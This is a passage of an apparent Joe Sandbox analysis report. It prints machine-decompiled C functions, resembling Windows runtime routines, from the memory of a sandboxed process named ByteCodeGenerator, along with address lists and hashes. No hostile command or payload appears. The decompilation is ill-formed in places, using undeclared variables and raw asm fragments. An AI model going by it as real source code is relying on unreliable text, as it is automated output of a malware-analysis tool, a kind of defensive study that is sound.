                                  0x034a7112
                                  0x034a7117
                                  0x034a7118
                                  0x034a7118
                                  0x034a70bb
                                  0x034a711d
                                  0x034a7123
                                  0x034a7131
                                  0x034a7131
                                  0x034a7136
                                  0x034a713d
                                  0x034a713e
                                  0x034a713f
                                  0x034a714a
                                  0x034a714a
                                  0x034a7084
                                  0x034a7088
                                  0x00000000
                                  0x034a708e
                                  0x034a708e
                                  0x034a7092
                                  0x00000000
                                  0x034a7092

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 71c75287cbd132abb0ed0c67bdbba281d8624d95711ea64b40d451bbc52b146d
                                  • Instruction ID: 131ac787a5b7f7720ed13144555073e33cf203fb827ffcddd4eed3025242b8d9
                                  • Opcode Fuzzy Hash: 71c75287cbd132abb0ed0c67bdbba281d8624d95711ea64b40d451bbc52b146d
                                  • Instruction Fuzzy Hash: 8831C576604B519FC320DF69C840A6BB7E5BF98600F084A2EF8958F790E730E904C7A9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 92%
                                  			E0345A70E(intOrPtr* __ecx, char* __edx) {
                                  				unsigned int _v8;
                                  				intOrPtr* _v12;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				void* _t16;
                                  				intOrPtr _t17;
                                  				intOrPtr _t28;
                                  				char* _t33;
                                  				intOrPtr _t37;
                                  				intOrPtr _t38;
                                  				void* _t50;
                                  				intOrPtr _t52;
                                  
                                  				_push(__ecx);
                                  				_push(__ecx);
                                  				_t52 =  *0x3517b10; // 0x0
                                  				_t33 = __edx;
                                  				_t48 = __ecx;
                                  				_v12 = __ecx;
                                  				if(_t52 == 0) {
                                  					 *0x3517b10 = 8;
                                  					 *0x3517b14 = 0x3517b0c;
                                  					 *0x3517b18 = 1;
                                  					L6:
                                  					_t2 = _t52 + 1; // 0x1
                                  					E0345A990(0x3517b10, _t2, 7);
                                  					asm("bts ecx, eax");
                                  					 *_t48 = _t52;
                                  					 *_t33 = 1;
                                  					L3:
                                  					_t16 = 0;
                                  					L4:
                                  					return _t16;
                                  				}
                                  				_t17 = L0345A840(__edx, __ecx, __ecx, _t52, 0x3517b10, 1, 0);
                                  				if(_t17 == 0xffffffff) {
                                  					_t37 =  *0x3517b10; // 0x0
                                  					_t3 = _t37 + 0x27; // 0x27
                                  					__eflags = _t3 >> 5 -  *0x3517b18; // 0x0
                                  					if(__eflags > 0) {
                                  						_t38 =  *0x3517b9c; // 0x0
                                  						_t4 = _t52 + 0x27; // 0x27
                                  						_v8 = _t4 >> 5;
                                  						_t50 = L03444620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
                                  						__eflags = _t50;
                                  						if(_t50 == 0) {
                                  							_t16 = 0xc0000017;
                                  							goto L4;
                                  						}
                                  						 *0x3517b18 = _v8;
                                  						_t8 = _t52 + 7; // 0x7
                                  						E0346F3E0(_t50,  *0x3517b14, _t8 >> 3);
                                  						_t28 =  *0x3517b14; // 0x0
                                  						__eflags = _t28 - 0x3517b0c;
                                  						if(_t28 != 0x3517b0c) {
                                  							L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
                                  						}
                                  						_t9 = _t52 + 8; // 0x8
                                  						 *0x3517b14 = _t50;
                                  						_t48 = _v12;
                                  						 *0x3517b10 = _t9;
                                  						goto L6;
                                  					}
                                  					 *0x3517b10 = _t37 + 8;
                                  					goto L6;
                                  				}
                                  				 *__ecx = _t17;
                                  				 *_t33 = 0;
                                  				goto L3;
                                  			}
















                                  0x0345a713
                                  0x0345a714
                                  0x0345a717
                                  0x0345a71d
                                  0x0345a720
                                  0x0345a722
                                  0x0345a727
                                  0x0345a74a
                                  0x0345a754
                                  0x0345a75e
                                  0x0345a768
                                  0x0345a76a
                                  0x0345a773
                                  0x0345a78b
                                  0x0345a790
                                  0x0345a792
                                  0x0345a741
                                  0x0345a741
                                  0x0345a743
                                  0x0345a749
                                  0x0345a749
                                  0x0345a732
                                  0x0345a73a
                                  0x0345a797
                                  0x0345a79d
                                  0x0345a7a3
                                  0x0345a7a9
                                  0x0345a7b6
                                  0x0345a7bc
                                  0x0345a7ca
                                  0x0345a7e0
                                  0x0345a7e2
                                  0x0345a7e4
                                  0x03499bf2
                                  0x00000000
                                  0x03499bf2
                                  0x0345a7ed
                                  0x0345a7f2
                                  0x0345a800
                                  0x0345a805
                                  0x0345a80d
                                  0x0345a812
                                  0x03499c08
                                  0x03499c08
                                  0x0345a818
                                  0x0345a81b
                                  0x0345a821
                                  0x0345a824
                                  0x00000000
                                  0x0345a824
                                  0x0345a7ae
                                  0x00000000
                                  0x0345a7ae
                                  0x0345a73c
                                  0x0345a73e
                                  0x00000000

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a5dc80c0cb4ad86b75d67f84a7304b634529190ddee0ce9c23e7de51e9e15f12
                                  • Instruction ID: e5e3a23fbf18ad3599494f6af8f7fbfd8091194e47230a498f0420f948fd1efd
                                  • Opcode Fuzzy Hash: a5dc80c0cb4ad86b75d67f84a7304b634529190ddee0ce9c23e7de51e9e15f12
                                  • Instruction Fuzzy Hash: 5631AEB1B002049FD712EF1CE880F2BBBF9FB88710F140A5AE4158B365E774A906DB95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 95%
                                  			E0342AA16(signed short* __ecx) {
                                  				signed int _v8;
                                  				intOrPtr _v12;
                                  				signed short _v16;
                                  				intOrPtr _v20;
                                  				signed short _v24;
                                  				signed short _v28;
                                  				void* _v32;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				intOrPtr _t25;
                                  				signed short _t38;
                                  				signed short* _t42;
                                  				signed int _t44;
                                  				signed short* _t52;
                                  				signed short _t53;
                                  				signed int _t54;
                                  
                                  				_v8 =  *0x351d360 ^ _t54;
                                  				_t42 = __ecx;
                                  				_t44 =  *__ecx & 0x0000ffff;
                                  				_t52 =  &(__ecx[2]);
                                  				_t51 = _t44 + 2;
                                  				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
                                  					L4:
                                  					_t25 =  *0x3517b9c; // 0x0
                                  					_t53 = L03444620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
                                  					__eflags = _t53;
                                  					if(_t53 == 0) {
                                  						L3:
                                  						return E0346B640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
                                  					} else {
                                  						E0346F3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
                                  						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
                                  						L2:
                                  						_t51 = 4;
                                  						if(L03436C59(_t53, _t51, _t58) != 0) {
                                  							_t28 = E03455E50(0x340c338, 0, 0,  &_v32);
                                  							__eflags = _t28;
                                  							if(_t28 == 0) {
                                  								_t38 = ( *_t42 & 0x0000ffff) + 2;
                                  								__eflags = _t38;
                                  								_v24 = _t53;
                                  								_v16 = _t38;
                                  								_v20 = 0;
                                  								_v12 = 0;
                                  								E0345B230(_v32, _v28, 0x340c2d8, 1,  &_v24);
                                  								_t28 = E0342F7A0(_v32, _v28);
                                  							}
                                  							__eflags = _t53 -  *_t52;
                                  							if(_t53 !=  *_t52) {
                                  								_t28 = L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
                                  							}
                                  						}
                                  						goto L3;
                                  					}
                                  				}
                                  				_t53 =  *_t52;
                                  				_t44 = _t44 >> 1;
                                  				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
                                  				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
                                  					goto L4;
                                  				}
                                  				goto L2;
                                  			}




















                                  0x0342aa25
                                  0x0342aa29
                                  0x0342aa2d
                                  0x0342aa30
                                  0x0342aa37
                                  0x0342aa3c
                                  0x03484458
                                  0x03484458
                                  0x03484472
                                  0x03484474
                                  0x03484476
                                  0x0342aa64
                                  0x0342aa74
                                  0x0348447c
                                  0x03484483
                                  0x03484492
                                  0x0342aa52
                                  0x0342aa54
                                  0x0342aa5e
                                  0x034844a8
                                  0x034844ad
                                  0x034844af
                                  0x034844b6
                                  0x034844b6
                                  0x034844b9
                                  0x034844bc
                                  0x034844cd
                                  0x034844d3
                                  0x034844d6
                                  0x034844e1
                                  0x034844e1
                                  0x034844e6
                                  0x034844e8
                                  0x034844fb
                                  0x034844fb
                                  0x034844e8
                                  0x00000000
                                  0x0342aa5e
                                  0x03484476
                                  0x0342aa42
                                  0x0342aa46
                                  0x0342aa48
                                  0x0342aa4c
                                  0x00000000
                                  0x00000000
                                  0x00000000

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ded23a53567fa2c954801f3877cb99a08b5c4178e1d35dcfc142ece9577f9e39
                                  • Instruction ID: 064be4c51f2fadb3e03834197dcf07c1b81f7142bf22f38f87553ea8978f6a9a
                                  • Opcode Fuzzy Hash: ded23a53567fa2c954801f3877cb99a08b5c4178e1d35dcfc142ece9577f9e39
                                  • Instruction Fuzzy Hash: 3631C471A00229AFCF11EF65C981A7FB7B9EF04B00B45406BF911EF250EB349911D7A9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 97%
                                  			E034561A0(signed int* __ecx) {
                                  				intOrPtr _v8;
                                  				char _v12;
                                  				intOrPtr* _v16;
                                  				intOrPtr _v20;
                                  				intOrPtr _t30;
                                  				intOrPtr _t31;
                                  				void* _t32;
                                  				intOrPtr _t33;
                                  				intOrPtr _t37;
                                  				intOrPtr _t49;
                                  				signed int _t51;
                                  				intOrPtr _t52;
                                  				signed int _t54;
                                  				void* _t59;
                                  				signed int* _t61;
                                  				intOrPtr* _t64;
                                  
                                  				_t61 = __ecx;
                                  				_v12 = 0;
                                  				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
                                  				_v16 = __ecx;
                                  				_v8 = 0;
                                  				if(_t30 == 0) {
                                  					L6:
                                  					_t31 = 0;
                                  					L7:
                                  					return _t31;
                                  				}
                                  				_t32 = _t30 + 0x5d8;
                                  				if(_t32 == 0) {
                                  					goto L6;
                                  				}
                                  				_t59 = _t32 + 0x30;
                                  				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
                                  					goto L6;
                                  				}
                                  				if(__ecx != 0) {
                                  					 *((intOrPtr*)(__ecx)) = 0;
                                  					 *((intOrPtr*)(__ecx + 4)) = 0;
                                  				}
                                  				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
                                  					_t51 =  *(_t32 + 0x10);
                                  					_t33 = _t32 + 0x10;
                                  					_v20 = _t33;
                                  					_t54 =  *(_t33 + 4);
                                  					if((_t51 | _t54) == 0) {
                                  						_t37 = E03455E50(0x34067cc, 0, 0,  &_v12);
                                  						if(_t37 != 0) {
                                  							goto L6;
                                  						}
                                  						_t52 = _v8;
                                  						asm("lock cmpxchg8b [esi]");
                                  						_t64 = _v16;
                                  						_t49 = _t37;
                                  						_v20 = 0;
                                  						if(_t37 == 0) {
                                  							if(_t64 != 0) {
                                  								 *_t64 = _v12;
                                  								 *((intOrPtr*)(_t64 + 4)) = _t52;
                                  							}
                                  							E034F9D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
                                  							_t31 = 1;
                                  							goto L7;
                                  						}
                                  						E0342F7C0(_t52, _v12, _t52, 0);
                                  						if(_t64 != 0) {
                                  							 *_t64 = _t49;
                                  							 *((intOrPtr*)(_t64 + 4)) = _v20;
                                  						}
                                  						L12:
                                  						_t31 = 1;
                                  						goto L7;
                                  					}
                                  					if(_t61 != 0) {
                                  						 *_t61 = _t51;
                                  						_t61[1] = _t54;
                                  					}
                                  					goto L12;
                                  				} else {
                                  					goto L6;
                                  				}
                                  			}



















                                  0x034561b3
                                  0x034561b5
                                  0x034561bd
                                  0x034561c3
                                  0x034561c7
                                  0x034561d2
                                  0x034561ff
                                  0x034561ff
                                  0x03456201
                                  0x03456207
                                  0x03456207
                                  0x034561d4
                                  0x034561d9
                                  0x00000000
                                  0x00000000
                                  0x034561df
                                  0x034561e2
                                  0x00000000
                                  0x00000000
                                  0x034561e6
                                  0x034561e8
                                  0x034561ee
                                  0x034561ee
                                  0x034561f9
                                  0x0349762f
                                  0x03497632
                                  0x03497635
                                  0x03497639
                                  0x03497640
                                  0x0349766e
                                  0x03497675
                                  0x00000000
                                  0x00000000
                                  0x03497681
                                  0x03497689
                                  0x0349768d
                                  0x03497691
                                  0x03497695
                                  0x03497699
                                  0x034976af
                                  0x034976b5
                                  0x034976b7
                                  0x034976b7
                                  0x034976d7
                                  0x034976dc
                                  0x00000000
                                  0x034976dc
                                  0x034976a2
                                  0x034976a9
                                  0x03497651
                                  0x03497653
                                  0x03497653
                                  0x03497656
                                  0x03497656
                                  0x00000000
                                  0x03497656
                                  0x03497644
                                  0x03497646
                                  0x03497648
                                  0x03497648
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7353ad0910b9ac93546ea6a7e8b9b48d110a169ff98e9304283513d64a8eabfd
                                  • Instruction ID: 953fba7044cd7701ddb5412573ba561d8f8693722e218ae8a37f9ac3a7075421
                                  • Opcode Fuzzy Hash: 7353ad0910b9ac93546ea6a7e8b9b48d110a169ff98e9304283513d64a8eabfd
                                  • Instruction Fuzzy Hash: CB314A71A157018FE720CF19C840B26FBE4EB88B10F49496FF9949B362D774E804CB99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 58%
                                  			E03464A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
                                  				signed int _v8;
                                  				signed int* _v12;
                                  				char _v13;
                                  				signed int _v16;
                                  				char _v21;
                                  				signed int* _v24;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				signed int _t29;
                                  				signed int* _t32;
                                  				signed int* _t41;
                                  				signed int _t42;
                                  				void* _t43;
                                  				intOrPtr* _t51;
                                  				void* _t52;
                                  				signed int _t53;
                                  				signed int _t58;
                                  				void* _t59;
                                  				signed int _t60;
                                  				signed int _t62;
                                  
                                  				_t49 = __edx;
                                  				_t62 = (_t60 & 0xfffffff8) - 0xc;
                                  				_t26 =  *0x351d360 ^ _t62;
                                  				_v8 =  *0x351d360 ^ _t62;
                                  				_t41 = __ecx;
                                  				_t51 = __edx;
                                  				_v12 = __ecx;
                                  				if(_a4 == 0) {
                                  					if(_a8 != 0) {
                                  						goto L1;
                                  					}
                                  					_v13 = 1;
                                  					E03442280(_t26, 0x3518608);
                                  					_t58 =  *_t41;
                                  					if(_t58 == 0) {
                                  						L11:
                                  						E0343FFB0(_t41, _t51, 0x3518608);
                                  						L2:
                                  						 *0x351b1e0(_a4, _a8);
                                  						_t42 =  *_t51();
                                  						if(_t42 == 0) {
                                  							_t29 = 0;
                                  							L5:
                                  							_pop(_t52);
                                  							_pop(_t59);
                                  							_pop(_t43);
                                  							return E0346B640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
                                  						}
                                  						 *((intOrPtr*)(_t42 + 0x34)) = 1;
                                  						if(_v21 != 0) {
                                  							_t53 = 0;
                                  							E03442280(_t28, 0x3518608);
                                  							_t32 = _v24;
                                  							if( *_t32 == _t58) {
                                  								 *_t32 = _t42;
                                  								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
                                  								if(_t58 != 0) {
                                  									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
                                  									asm("sbb edi, edi");
                                  									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
                                  								}
                                  							}
                                  							E0343FFB0(_t42, _t53, 0x3518608);
                                  							if(_t53 != 0) {
                                  								L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
                                  							}
                                  						}
                                  						_t29 = _t42;
                                  						goto L5;
                                  					}
                                  					if( *((char*)(_t58 + 0x40)) != 0) {
                                  						L10:
                                  						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
                                  						E0343FFB0(_t41, _t51, 0x3518608);
                                  						_t29 = _t58;
                                  						goto L5;
                                  					}
                                  					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
                                  					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
                                  						goto L11;
                                  					}
                                  					goto L10;
                                  				}
                                  				L1:
                                  				_v13 = 0;
                                  				_t58 = 0;
                                  				goto L2;
                                  			}
























                                  0x03464a2c
                                  0x03464a34
                                  0x03464a3c
                                  0x03464a3e
                                  0x03464a48
                                  0x03464a4b
                                  0x03464a4d
                                  0x03464a51
                                  0x03464a9c
                                  0x00000000
                                  0x00000000
                                  0x03464aa3
                                  0x03464aa8
                                  0x03464aad
                                  0x03464ab1
                                  0x03464ade
                                  0x03464ae3
                                  0x03464a5a
                                  0x03464a62
                                  0x03464a6a
                                  0x03464a6e
                                  0x0349f203
                                  0x03464a84
                                  0x03464a88
                                  0x03464a89
                                  0x03464a8a
                                  0x03464a95
                                  0x03464a95
                                  0x03464a79
                                  0x03464a80
                                  0x03464af2
                                  0x03464af4
                                  0x03464af9
                                  0x03464aff
                                  0x03464b01
                                  0x03464b03
                                  0x03464b08
                                  0x0349f20a
                                  0x0349f212
                                  0x0349f216
                                  0x0349f216
                                  0x03464b08
                                  0x03464b13
                                  0x03464b1a
                                  0x0349f229
                                  0x0349f229
                                  0x03464b1a
                                  0x03464a82
                                  0x00000000
                                  0x03464a82
                                  0x03464ab7
                                  0x03464acd
                                  0x03464acd
                                  0x03464ad5
                                  0x03464ada
                                  0x00000000
                                  0x03464ada
                                  0x03464ac2
                                  0x03464acb
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x03464acb
                                  0x03464a53
                                  0x03464a53
                                  0x03464a58
                                  0x00000000

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0c245958b7621e1772176f63f41757b0a95d6aec9dfee1ce121a8525debab92c
                                  • Instruction ID: a7e0bc600ab3ce8b705628360a5a749d648c64e7d440e4d039c9cab29218f0b8
                                  • Opcode Fuzzy Hash: 0c245958b7621e1772176f63f41757b0a95d6aec9dfee1ce121a8525debab92c
                                  • Instruction Fuzzy Hash: 6C31DE32215754AFDB21DF56C941B2BBBA8FB85A10F08456BE8664F350C7B0D805CB9E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 93%
                                  			E03468EC7(void* __ecx, void* __edx) {
                                  				signed int _v8;
                                  				intOrPtr _v16;
                                  				intOrPtr _v20;
                                  				intOrPtr _v24;
                                  				char* _v28;
                                  				intOrPtr _v32;
                                  				intOrPtr _v36;
                                  				intOrPtr _v40;
                                  				signed int* _v44;
                                  				intOrPtr _v48;
                                  				intOrPtr _v52;
                                  				intOrPtr _v56;
                                  				signed int* _v60;
                                  				intOrPtr _v64;
                                  				intOrPtr _v68;
                                  				intOrPtr _v72;
                                  				char* _v76;
                                  				intOrPtr _v80;
                                  				signed int _v84;
                                  				intOrPtr _v88;
                                  				intOrPtr _v92;
                                  				intOrPtr _v96;
                                  				intOrPtr _v100;
                                  				intOrPtr _v104;
                                  				signed int* _v108;
                                  				char _v140;
                                  				signed int _v144;
                                  				signed int _v148;
                                  				intOrPtr _v152;
                                  				char _v156;
                                  				intOrPtr _v160;
                                  				char _v164;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				void* _t67;
                                  				intOrPtr _t70;
                                  				void* _t71;
                                  				void* _t72;
                                  				signed int _t73;
                                  
                                  				_t69 = __edx;
                                  				_v8 =  *0x351d360 ^ _t73;
                                  				_t48 =  *[fs:0x30];
                                  				_t72 = __edx;
                                  				_t71 = __ecx;
                                  				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
                                  					_t48 = E03454E70(0x35186e4, 0x3469490, 0, 0);
                                  					if( *0x35153e8 > 5 && E03468F33(0x35153e8, 0, 0x2000) != 0) {
                                  						_v156 =  *((intOrPtr*)(_t71 + 0x44));
                                  						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
                                  						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
                                  						_v164 =  *((intOrPtr*)(_t72 + 0x58));
                                  						_v108 =  &_v84;
                                  						_v92 =  *((intOrPtr*)(_t71 + 0x28));
                                  						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
                                  						_v76 =  &_v156;
                                  						_t70 = 8;
                                  						_v60 =  &_v144;
                                  						_t67 = 4;
                                  						_v44 =  &_v148;
                                  						_v152 = 0;
                                  						_v160 = 0;
                                  						_v104 = 0;
                                  						_v100 = 2;
                                  						_v96 = 0;
                                  						_v88 = 0;
                                  						_v80 = 0;
                                  						_v72 = 0;
                                  						_v68 = _t70;
                                  						_v64 = 0;
                                  						_v56 = 0;
                                  						_v52 = 0x35153e8;
                                  						_v48 = 0;
                                  						_v40 = 0;
                                  						_v36 = 0x35153e8;
                                  						_v32 = 0;
                                  						_v28 =  &_v164;
                                  						_v24 = 0;
                                  						_v20 = _t70;
                                  						_v16 = 0;
                                  						_t69 = 0x340bc46;
                                  						_t48 = E034A7B9C(0x35153e8, 0x340bc46, _t67, 0x35153e8, _t70,  &_v140);
                                  					}
                                  				}
                                  				return E0346B640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
                                  			}











































                                  0x03468ec7
                                  0x03468ed9
                                  0x03468edc
                                  0x03468ee6
                                  0x03468ee9
                                  0x03468eee
                                  0x03468efc
                                  0x03468f08
                                  0x034a1349
                                  0x034a1353
                                  0x034a135d
                                  0x034a1366
                                  0x034a136f
                                  0x034a1375
                                  0x034a137c
                                  0x034a1385
                                  0x034a1390
                                  0x034a1391
                                  0x034a139c
                                  0x034a139d
                                  0x034a13a6
                                  0x034a13ac
                                  0x034a13b2
                                  0x034a13b5
                                  0x034a13bc
                                  0x034a13bf
                                  0x034a13c2
                                  0x034a13c5
                                  0x034a13c8
                                  0x034a13cb
                                  0x034a13ce
                                  0x034a13d1
                                  0x034a13d4
                                  0x034a13d7
                                  0x034a13da
                                  0x034a13dd
                                  0x034a13e0
                                  0x034a13e3
                                  0x034a13e6
                                  0x034a13e9
                                  0x034a13f6
                                  0x034a1400
                                  0x034a1400
                                  0x03468f08
                                  0x03468f32

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 585cc5cdcec705e7a6772b47bf6f59a6a2b0ed07df3ec5980d1d87c39766aa79
                                  • Instruction ID: 1e29c5e1f9121ebdcf979383e6e5ff12457a1a4f6f46b5d24a9dff55ba7c45ae
                                  • Opcode Fuzzy Hash: 585cc5cdcec705e7a6772b47bf6f59a6a2b0ed07df3ec5980d1d87c39766aa79
                                  • Instruction Fuzzy Hash: 494191B1D003189EDB24CFAAD980AADFBF8FB48310F5041AFE519AB240E7705A84CF55
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 74%
                                  			E0345E730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
                                  				intOrPtr* _v0;
                                  				signed char _v4;
                                  				signed int _v8;
                                  				void* __ecx;
                                  				void* __ebp;
                                  				void* _t37;
                                  				intOrPtr _t38;
                                  				signed int _t44;
                                  				signed char _t52;
                                  				void* _t54;
                                  				intOrPtr* _t56;
                                  				void* _t58;
                                  				char* _t59;
                                  				signed int _t62;
                                  
                                  				_t58 = __edx;
                                  				_push(0);
                                  				_push(4);
                                  				_push( &_v8);
                                  				_push(0x24);
                                  				_push(0xffffffff);
                                  				if(E03469670() < 0) {
                                  					L0347DF30(_t54, _t58, _t35);
                                  					asm("int3");
                                  					asm("int3");
                                  					asm("int3");
                                  					asm("int3");
                                  					asm("int3");
                                  					asm("int3");
                                  					_push(_t54);
                                  					_t52 = _v4;
                                  					if(_t52 > 8) {
                                  						_t37 = 0xc0000078;
                                  					} else {
                                  						_t38 =  *0x3517b9c; // 0x0
                                  						_t62 = _t52 & 0x000000ff;
                                  						_t59 = L03444620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
                                  						if(_t59 == 0) {
                                  							_t37 = 0xc0000017;
                                  						} else {
                                  							_t56 = _v0;
                                  							 *(_t59 + 1) = _t52;
                                  							 *_t59 = 1;
                                  							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
                                  							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
                                  							_t44 = _t62 - 1;
                                  							if(_t44 <= 7) {
                                  								switch( *((intOrPtr*)(_t44 * 4 +  &M0345E810))) {
                                  									case 0:
                                  										L6:
                                  										 *((intOrPtr*)(_t59 + 8)) = _a8;
                                  										goto L7;
                                  									case 1:
                                  										L13:
                                  										 *((intOrPtr*)(__edx + 0xc)) = _a12;
                                  										goto L6;
                                  									case 2:
                                  										L12:
                                  										 *((intOrPtr*)(__edx + 0x10)) = _a16;
                                  										goto L13;
                                  									case 3:
                                  										L11:
                                  										 *((intOrPtr*)(__edx + 0x14)) = _a20;
                                  										goto L12;
                                  									case 4:
                                  										L10:
                                  										 *((intOrPtr*)(__edx + 0x18)) = _a24;
                                  										goto L11;
                                  									case 5:
                                  										L9:
                                  										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
                                  										goto L10;
                                  									case 6:
                                  										L17:
                                  										 *((intOrPtr*)(__edx + 0x20)) = _a32;
                                  										goto L9;
                                  									case 7:
                                  										 *((intOrPtr*)(__edx + 0x24)) = _a36;
                                  										goto L17;
                                  								}
                                  							}
                                  							L7:
                                  							 *_a40 = _t59;
                                  							_t37 = 0;
                                  						}
                                  					}
                                  					return _t37;
                                  				} else {
                                  					_push(0x20);
                                  					asm("ror eax, cl");
                                  					return _a4 ^ _v8;
                                  				}
                                  			}

















                                  0x0345e730
                                  0x0345e736
                                  0x0345e738
                                  0x0345e73d
                                  0x0345e73e
                                  0x0345e740
                                  0x0345e749
                                  0x0345e765
                                  0x0345e76a
                                  0x0345e76b
                                  0x0345e76c
                                  0x0345e76d
                                  0x0345e76e
                                  0x0345e76f
                                  0x0345e775
                                  0x0345e777
                                  0x0345e77e
                                  0x0349b675
                                  0x0345e784
                                  0x0345e784
                                  0x0345e789
                                  0x0345e7a8
                                  0x0345e7ac
                                  0x0345e807
                                  0x0345e7ae
                                  0x0345e7ae
                                  0x0345e7b1
                                  0x0345e7b4
                                  0x0345e7b9
                                  0x0345e7c0
                                  0x0345e7c4
                                  0x0345e7ca
                                  0x0345e7cc
                                  0x00000000
                                  0x0345e7d3
                                  0x0345e7d6
                                  0x00000000
                                  0x00000000
                                  0x0345e7ff
                                  0x0345e802
                                  0x00000000
                                  0x00000000
                                  0x0345e7f9
                                  0x0345e7fc
                                  0x00000000
                                  0x00000000
                                  0x0345e7f3
                                  0x0345e7f6
                                  0x00000000
                                  0x00000000
                                  0x0345e7ed
                                  0x0345e7f0
                                  0x00000000
                                  0x00000000
                                  0x0345e7e7
                                  0x0345e7ea
                                  0x00000000
                                  0x00000000
                                  0x0349b685
                                  0x0349b688
                                  0x00000000
                                  0x00000000
                                  0x0349b682
                                  0x00000000
                                  0x00000000
                                  0x0345e7cc
                                  0x0345e7d9
                                  0x0345e7dc
                                  0x0345e7de
                                  0x0345e7de
                                  0x0345e7ac
                                  0x0345e7e4
                                  0x0345e74b
                                  0x0345e751
                                  0x0345e759
                                  0x0345e761
                                  0x0345e761

                                  Memory Dump Source
